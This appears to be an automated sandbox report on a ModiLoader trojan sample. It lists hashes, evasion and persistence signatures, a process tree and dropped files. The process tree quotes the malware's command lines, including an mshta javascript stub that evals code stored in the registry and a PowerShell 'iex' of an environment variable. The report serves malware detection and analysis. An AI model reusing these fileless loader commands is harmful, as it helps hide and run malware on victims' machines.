Overview

overview

10

Static

static

3

3899ddd721...18.exe

windows7-x64

10

3899ddd721...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    12-05-2024 05:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3899ddd721f4d538d9a4e05071eebf3a_JaffaCakes118.exe

  • Size

    263KB

  • MD5

    3899ddd721f4d538d9a4e05071eebf3a

  • SHA1

    c5381f782c422b646fb068f67ac16b897a665085

  • SHA256

    8cfbec91b6708bde1134cf09a930870aad95c7b5ba2cf42d88aed8aa456a6006

  • SHA512

    97f4ef25c698ef0469c59f648a4b09192aad9cbb8e21b6eeb6a5933b2503c1e76a6560990ba7c3153e14ea513f347619d153b70a84eb488c64790c33d04174ab

  • SSDEEP

    6144:HVmLW/8MCp5llt6wFd5oPji7r5yTh34mh:1mq/wp5x55oPj+rkTh3nh

Score
10/10
modiloaderevasionpersistencetrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
    evasion
  • ModiLoader Second Stage 59 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3899ddd721f4d538d9a4e05071eebf3a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3899ddd721f4d538d9a4e05071eebf3a_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Users\Admin\AppData\Local\Temp\3899ddd721f4d538d9a4e05071eebf3a_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3899ddd721f4d538d9a4e05071eebf3a_JaffaCakes118.exe"
      2⤵
        PID:3052
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:mQGu2QBI0="RSG9y";X4j0=new%20ActiveXObject("WScript.Shell");Q9jio="ZBr";nhu1P6=X4j0.RegRead("HKLM\\software\\Wow6432Node\\BJDjRw\\uiu9cjpq");FtIs2="QB";eval(nhu1P6);gKiys3A="X3w3QmK";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:hvfstu
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1588
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:580

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\7358d4\2d9c5e.1879f4f
        Filesize

        37KB

        MD5

        9020119b9f5baa5e2a852ece792a3f62

        SHA1

        645b7f80ee5fbbad76debf4bdc74271c665a8429

        SHA256

        9f01ce412b8d9c8f4078323844a5c8838a14911178f7f986785f77f0a74a4fbf

        SHA512

        de454cca468cd3197a2fe3b8a720f9e680abf699e55fd6be170a560ec7d133954a01237ff2b1dc14c4c92087d4ef639ec8da267fc3fc692b4573fcaa9ccd12ae

        Download Submit
      • C:\Users\Admin\AppData\Local\7358d4\6d45a7.bat
        Filesize

        61B

        MD5

        14adc766d85da95cd0990ed6bcc1524d

        SHA1

        e3c8f83a8fbfea658c9139d3e670d609745fb848

        SHA256

        0245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4

        SHA512

        b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8

        Download Submit
      • C:\Users\Admin\AppData\Local\7358d4\e5ae70.lnk
        Filesize

        877B

        MD5

        17e03f9300ddbb2dcd726f2f1f9affdd

        SHA1

        765fce86b06e4a3ac81cf87e72ec5ad0d8a0d521

        SHA256

        4b9e9a9ad70a27b590e81009aee7e46ddb431ad521d6368cc0814be5a6680d5f

        SHA512

        5106bd4fe275b5ae9c9b9acf8e3597723cbed5c72e3bc90d2b69fee98373942d9ce874be2df31cee2df65f9ede3036c6a06a1ca591dce0c1a53ec13a5dc29067

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk
        Filesize

        987B

        MD5

        19ea87ba54822266fe9b9995bfc0ccec

        SHA1

        1bc988e41695beab64f587e4df8dcde80c632115

        SHA256

        bff09fe56691805d51676b6572878d799e2160708d43a12ae00fea270f81cb3c

        SHA512

        db4b54dc7d1864a5ffc2902dcf5fd20d4a56a3f17f9435c6946926e3b59856bb67fe7647c3a666d3c28ab79fef460944822aa81c699706dbf5edcb3716a5e06b

        Download Submit
      • C:\Users\Admin\AppData\Roaming\e53183\8858ab.1879f4f
        Filesize

        34KB

        MD5

        39cf629675a87e496233ef01d940b03e

        SHA1

        54204ae942046ac0b3a3323940a890737b990fd7

        SHA256

        0aaa7a12ce202587975e6c5d9b85dfdd922da97d2c2064a5bd2216149f5d1bbd

        SHA512

        540917ff48927cdf7408c8825df385b6444ddc370a4af0b7f2d4608338bd29e1a19bf41d75f72d4140bcbf00f9119731c2ee03057fa1ac1f13bfa891e0b55d10

        Download Submit
      • memory/580-71-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-67-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-68-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-69-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-70-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-77-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-72-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-73-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-74-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-75-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-76-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-82-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-81-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-80-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-79-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/580-78-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-66-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-35-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-32-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-23-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-24-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-28-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-29-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-30-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-31-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-33-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-34-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-27-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-55-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-54-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-53-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-52-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-51-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-50-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-49-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-48-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-47-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-46-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-44-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-43-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-42-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-41-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-40-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-39-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-38-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-37-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1588-36-0x0000000000250000-0x0000000000391000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2312-21-0x00000000062C0000-0x0000000006396000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2312-26-0x00000000062C0000-0x0000000006396000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-2-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3052-9-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-8-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-11-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-12-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-10-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-7-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-6-0x0000000001CF0000-0x0000000001DC6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3052-5-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3052-4-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download